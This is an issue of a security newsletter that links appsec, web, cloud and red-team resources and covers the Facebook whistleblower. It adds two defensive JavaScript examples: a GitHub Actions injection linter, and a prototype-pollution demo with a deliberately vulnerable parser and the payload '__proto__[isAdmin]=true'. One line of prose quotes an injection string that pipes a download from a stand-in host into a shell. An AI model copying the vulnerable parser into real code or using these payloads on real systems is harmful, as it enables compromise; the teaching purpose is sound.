
[tl;dr sec] #104 - New Phrack, Often Missed Web Vulnerabilities, Facebook Whistleblower

New issue of Phrack, 10 often missed web vulnerabilities, Facebook whistleblower comes forward about the dangers of its products.

Hey there,

I hope you’ve been doing well!

Tell me X without X

A trend on Twitter is to say something like “Tell me you work in security without telling me you’re in security.”

Sometimes the threads are fun, sometimes I find them tiring.

But! I did come across this epic burn by Matt Stratton:

For context, Travis CI was bought by a private equity firm, laid off a number of senior engineers, and discontinued their free tier for OSS projects.

To be honest I feel bad about including this, because Travis was/is a truly trailblazing company and great product. Perhaps this is an example then of the value of running DevRel-y content past developers before posting.

Anywho- I’ll have an exciting update next week, stay tuned! 😎

Sponsor

📢 The DevSecGuide to Infrastructure as Code

🔬 Research on the state of IaC security

🦋 Practical steps for embracing a DevSecOps culture

🔐 Tips for embedding security throughout the DevOps lifecycle

📜 In this newsletter...

  • AppSec: Semantic search tool for C and C++, how Yandex does SAST, how to use GitHub Actions securely

  • Mobile Security: Decrypt iOS apps using r2frida

  • Web Security: 10 often missed web vulnerabilities, finding prototype pollution at scale

  • Cloud Security: Query your cloud environment via GraphQL, tool to analyze CloudFormation templates using IAM Access Analyzer, common API for AWS services, handling ransomware on AWS whitepaper, comparing R2 and S3

  • Infrastructure as Code: Interactive Terraform visualizer, infra as code for AWS orgs

  • Container Security: Verify container signatures in Kubernetes using Notary or Cosign, tool to configure k8s resources into re-usable supply chains

  • Red Team: Tool for hacking drones, new Phrack issue

  • Misc: How Jackie Chan does action comedy, stop motion Darth Vader

  • Facebook whistleblower: Tells Congress Facebook's products hurt kids and weaken democracy

AppSec

googleprojectzero/weggli
A fast and robust semantic search tool for C and C++ codebases designed to help security researchers identify interesting functionality in large codebases, by Google Project Zero’s Felix Wilhelm.

Company Wide SAST: How we do SAST at Yandex
ZeroNights talk by Yandex’s Evgenii Protsenko et al. discussing the orchestrator they built to unify their SAST tools and how they write custom rules for Semgrep and CodeQL.

Protect Your GitHub Actions with Semgrep
r2c’s Grayson Hardaway gives a great overview of how GitHub Actions can be insecure and the impact (stealing secrets, backdooring the repo). There are actually a number of unexpected subtleties here that were interesting to read.

He’s also released a free Semgrep ruleset you can use to easily audit your GitHub Actions, and a demo repo if you want to practice these exploitation scenarios.

If you want to up your GitHub Action security game, this is probably one of the best posts I’ve seen in this space.
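As an added example, not code from r2c’s post, the Semgrep ruleset or the demo repo: a small JavaScript linter for the expression-injection pattern that ruleset targets, where an attacker-controlled `${{ }}` context (issue or PR title, branch name, commit message) is interpolated straight into a `run:` shell script and can break out of the command. The list of untrusted contexts follows GitHub’s own script-injection guidance and is a subset, the two workflows are constructed for the example, and the scanner is line-based rather than a real YAML parser, so treat it as a heuristic. The fixed workflow shows the standard mitigation: pass the value through `env:` and reference the quoted shell variable.

```javascript
// Added example (not r2c's ruleset or code from the post): a line-oriented
// linter that flags attacker-controlled ${{ ... }} contexts interpolated
// into `run:` scripts in a GitHub Actions workflow. Run with Node.js.

// Contexts whose value an outside contributor controls (issue/PR text,
// branch names, commit messages, comments). Subset of GitHub's guidance.
const UNTRUSTED_CONTEXTS = [
  /github\.event\.issue\.(title|body)/,
  /github\.event\.pull_request\.(title|body)/,
  /github\.event\.pull_request\.head\.(ref|label)/,
  /github\.event\.(comment|review|review_comment)\.body/,
  /github\.event\.head_commit\.(message|author\.(name|email))/,
  /github\.event\.commits(\[\d+\]|\.\*)\.(message|author\.(name|email))/,
  /github\.event\.pages(\[\d+\]|\.\*)\.page_name/,
  /github\.head_ref/,
];

// Collect every line of every `run:` script as {line, text}, handling both
// inline values and `|` / `>` block scalars by indentation (no YAML parser).
function collectRunLines(workflowText) {
  const lines = workflowText.split("\n");
  const out = [];
  for (let i = 0; i < lines.length; i++) {
    const m = lines[i].match(/^(\s*)(-\s+)?run:\s*(.*)$/);
    if (!m) continue;
    const keyCol = m[1].length + (m[2] ? m[2].length : 0); // column of "run"
    if (/^[|>]/.test(m[3])) {
      // Block scalar: body lines are blank or indented deeper than the key.
      for (let j = i + 1; j < lines.length; j++) {
        const indent = lines[j].match(/^\s*/)[0].length;
        if (lines[j].trim() !== "" && indent <= keyCol) break;
        out.push({ line: j + 1, text: lines[j] });
      }
    } else {
      out.push({ line: i + 1, text: m[3] });
    }
  }
  return out;
}

// Return one finding per ${{ ... }} in a run script that references an
// untrusted context: [{ line, expression }].
function auditWorkflow(workflowText) {
  const findings = [];
  for (const { line, text } of collectRunLines(workflowText)) {
    const re = /\$\{\{([^}]*)\}\}/g;
    let m;
    while ((m = re.exec(text)) !== null) {
      const expression = m[1].trim();
      if (UNTRUSTED_CONTEXTS.some((ctx) => ctx.test(expression))) {
        findings.push({ line, expression });
      }
    }
  }
  return findings;
}

// Constructed workflow: issue title and head ref land directly in a shell.
const VULNERABLE_WORKFLOW = [
  "name: triage",
  "on:",
  "  issues:",
  "    types: [opened]",
  "jobs:",
  "  triage:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v2",
  "      - name: Echo title",
  "        run: |",
  '          echo "New issue: ${{ github.event.issue.title }}"',
  '          echo "Run ${{ github.run_id }}"',
  "      - run: git checkout ${{ github.head_ref }}",
].join("\n");

// Constructed fix: the untrusted values go through env, the shell sees a
// quoted variable, and github.run_id (not attacker-controlled) stays as is.
const FIXED_WORKFLOW = [
  "name: triage",
  "on:",
  "  issues:",
  "    types: [opened]",
  "jobs:",
  "  triage:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v2",
  "      - name: Echo title",
  "        env:",
  "          TITLE: ${{ github.event.issue.title }}",
  "        run: |",
  '          echo "New issue: $TITLE"',
  '          echo "Run ${{ github.run_id }}"',
  "      - env:",
  "          BRANCH: ${{ github.head_ref }}",
  '        run: git checkout "$BRANCH"',
].join("\n");

console.log("vulnerable:", auditWorkflow(VULNERABLE_WORKFLOW));
console.log("fixed:", auditWorkflow(FIXED_WORKFLOW));
```

The env-based fix works because the runner substitutes `${{ }}` expressions into the script text before the shell ever sees it, whereas an environment variable is data the shell reads at run time; a title like `"; curl evil | sh; echo "` therefore stays inert. A proper audit should parse the YAML (the Semgrep ruleset does) and also cover `pull_request_target` and `actions/github-script` inputs, which this heuristic does not.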

Mobile Security

as0ler/r2flutch
Yet another tool to decrypt iOS apps using r2frida, by @as0ler.

Web Security

10 Types of Web Vulnerabilities that are Often Missed
Nice overview by Hakluke and Farah Hawa. HTTP/2 smuggling, XXE via Office Open XML parsers, SSRF via XSS in PDF generators, XSS via SVG files, blind XSS, web cache deception, web cache poisoning, h2c smuggling, second-order subdomain takeovers, postMessage bugs.

Exploiting Client-Side Prototype Pollution in the wild
Great work by Sergey Bobrov, s1r1us and others in finding prototype pollution issues at scale. The post has some useful methodology tips and links to various tools and other resources. They found 18 vulnerable libraries, reported ~80 bugs to vulnerability disclosure programs, and overall found more than 1,000 vulnerable websites.

We’ve found that 80% of nested parameter parsers are vulnerable to prototype pollution.
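The nested-parameter parser that quote refers to, as an added example (not code from the post, its authors or any of the libraries it names): a minimal parser for `a[b][c]=1` style query strings in a vulnerable form beside a hardened one, plus a gadget showing why a polluted `Object.prototype` matters. The query strings and the `isAdmin` gadget are constructed for the example.

```javascript
// Added example, not code from the post or its authors: a minimal "nested
// parameter" parser of the kind the post reports as commonly vulnerable
// (a[b][c]=1 -> {a: {b: {c: "1"}}}), first vulnerable, then hardened.
// Run with Node.js; the query strings below are constructed.

// Turn "a[b][c]" into ["a", "b", "c"]. Keys without brackets map to [key].
function splitKeyPath(rawKey) {
  const key = decodeURIComponent(rawKey);
  const m = key.match(/^([^\[\]]*)((?:\[[^\[\]]*\])*)$/);
  if (!m) return [key];
  const path = [m[1]];
  const bracket = /\[([^\[\]]*)\]/g;
  let part;
  while ((part = bracket.exec(m[2])) !== null) path.push(part[1]);
  return path;
}

// Split "k=v=w" at the first "=" only, so values may contain "=".
function splitPair(pair) {
  const eq = pair.indexOf("=");
  return eq === -1 ? [pair, ""] : [pair.slice(0, eq), pair.slice(eq + 1)];
}

// VULNERABLE: descends by plain property access, so the path
// ["__proto__", "x"] walks into Object.prototype and writes to it.
function parseNestedVulnerable(query) {
  const result = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const [rawKey, rawValue] = splitPair(pair);
    const path = splitKeyPath(rawKey);
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof node[path[i]] !== "object" || node[path[i]] === null) node[path[i]] = {};
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawValue);
  }
  return result;
}

// HARDENED: reject the three keys that reach the prototype chain, build on
// null-prototype objects so there is no chain to reach, and only descend
// into objects the parser itself created (own properties).
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function parseNestedSafe(query) {
  const result = Object.create(null);
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const [rawKey, rawValue] = splitPair(pair);
    const path = splitKeyPath(rawKey);
    if (path.some((k) => FORBIDDEN_KEYS.has(k))) continue; // drop the whole pair
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      const own = Object.prototype.hasOwnProperty.call(node, path[i]);
      if (!own || typeof node[path[i]] !== "object") node[path[i]] = Object.create(null);
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawValue);
  }
  return result;
}

// A "gadget" (constructed): unrelated application code that reads an option
// it never set. Once Object.prototype.isAdmin exists, every {} answers yes.
function isAdminView(options) {
  return options.isAdmin === "true";
}

// Run the same payload through both parsers and report what the gadget saw.
function demo() {
  const payload = "__proto__[isAdmin]=true&page=1";
  const before = isAdminView({});
  const polluted = parseNestedVulnerable(payload);
  const afterVulnerable = isAdminView({});
  delete Object.prototype.isAdmin; // undo the pollution for the rest of the process
  const safe = parseNestedSafe(payload);
  const afterSafe = isAdminView({});
  return {
    before,                              // false
    afterVulnerable,                     // true: {} inherited isAdmin from Object.prototype
    afterSafe,                           // false
    pollutedKeys: Object.keys(polluted), // ["page"]: the attack left no own property behind
    safeKeys: Object.keys(safe),         // ["page"]: the forbidden pair was dropped
  };
}

console.log(demo());
```

The tell-tale sign in a real audit is the middle loop: any parser that does `node[key] = node[key] || {}` on an attacker-chosen key without filtering `__proto__` (or `constructor.prototype`) can be driven into `Object.prototype`, and `Object.keys` on the result shows nothing because the write did not land on an own property.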

Cloud Security

cloudgraphdev/cli
CloudGraph is an open-source GraphQL powered search engine that makes it easy to query your cloud infrastructure and configuration so that you can solve a host of complex security, compliance, and governance challenges.

Validate IAM policies in CloudFormation templates using IAM Access Analyzer
AWS’ Matt Luttrell introduces IAM Policy Validator for CloudFormation (cfn-policy-validator), an open source tool that extracts IAM policies from a CloudFormation template, and allows you to run existing IAM Access Analyzer policy validation APIs against the template.

AWS Cloud Control API, a Uniform API to Access AWS & Third-Party Services
Cloud Control API is a standard set of APIs to Create, Read, Update, Delete, and List (CRUDL) resources across hundreds of AWS Services and dozens of third-party services. Basically, instead of having different naming conventions across services, you have common verbs like CreateResource, GetResource, etc.

Introducing the Ransomware Risk Management on AWS Whitepaper
AWS’ Temi Adebambo announces a whitepaper that aligns NIST’s recommended security controls for ransomware risk management with workloads built on AWS. The whitepaper maps technical capabilities to AWS services and implementation guidance.

  • Who could benefit from switching

  • What would stop ideal customers from adopting R2

  • Who is better served by other providers

  • What we still don’t know about R2

Infrastructure as Code

im2nguyen/rover
Interactive Terraform visualizer. Explore the relationships and dependencies between various Terraform resources.

org-formation/org-formation-cli
An Infrastructure as Code (IaC) tool for AWS Organizations.

Container Security

Verify Container Signatures in Kubernetes using Notary or Cosign
Christoph Hamsen discusses v2.0 of Connaisseur, an admission controller to integrate container image signature verification and trust pinning into a Kubernetes cluster. v2.0 adds support for multiple keys and signature solutions.

Announcing Cartographer
“Cartographer allows users to configure Kubernetes resources into re-usable supply chains that can be used to define all of the stages that an Application Workload must go through to get to an environment,” by @OssCartographer.

Red Team

dhondta/dronesploit
A CLI framework gathering hacking techniques and exploits especially focused on targeting drones, by Alexandre D’Hondt.

Phrack #70
New Phrack! A number of neat technical articles, as always, including: attacking JavaScript engines, VM escapes, .NET instrumentation, decoding an iOS kernel vulnerability, hypervisor bugs, a discussion of the YouTube security scene, and Shellphish’s submission to the Cyber Grand Challenge, an automatic vulnerability exploitation and patching event held by DARPA.

Misc

Jackie Chan - How to Do Action Comedy
Since I was young, I’ve been a huge fan of Jackie Chan’s movies. I really enjoyed this breakdown of shot and editing choices as well as Jackie’s willingness to do hundreds of takes to make things perfect.

Moving Darth Vader’s Force FX Lightsaber in Stop Motion
Darth Vader playing with his pet AT-AT, pretty cute.

Facebook Whistleblower

Facebook’s products “harm children, stoke division, weaken our democracy and much more,” said Frances Haugen, the former Facebook employee who leaked tens of thousands of pages of internal documents.


From Frances Haugen’s ~13min 60 Minutes interview:

The thing I saw at Facebook, over and over again, is there were conflicts of interest between what was good for the public and what was good for Facebook. And Facebook over and over again chose to optimize for its own interests, like making more money.

Person after person after person has tackled this inside of Facebook, and ground themselves to the ground.

To quote from one of the internal resources she shared:

“We have evidence from a variety of sources that hate speech, divisive political speech, and misinformation on Facebook and the family of apps are affecting societies around the world.”

Fascinatingly, apparently EU politicians reached out to Facebook after its 2018 algorithm change, and said they:

…feel strongly that the change to the algorithm has forced them to skew negative in their communications on Facebook… leading them into more extreme policy decisions.

So politicians feel like they have to change their messaging and adopt more extreme positions to get competitive levels of engagement on Facebook.

I’m going to repeat that because it’s crazy: a social media company’s algorithms are directly impacting political rhetoric and positions, and thus the direction of nations.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint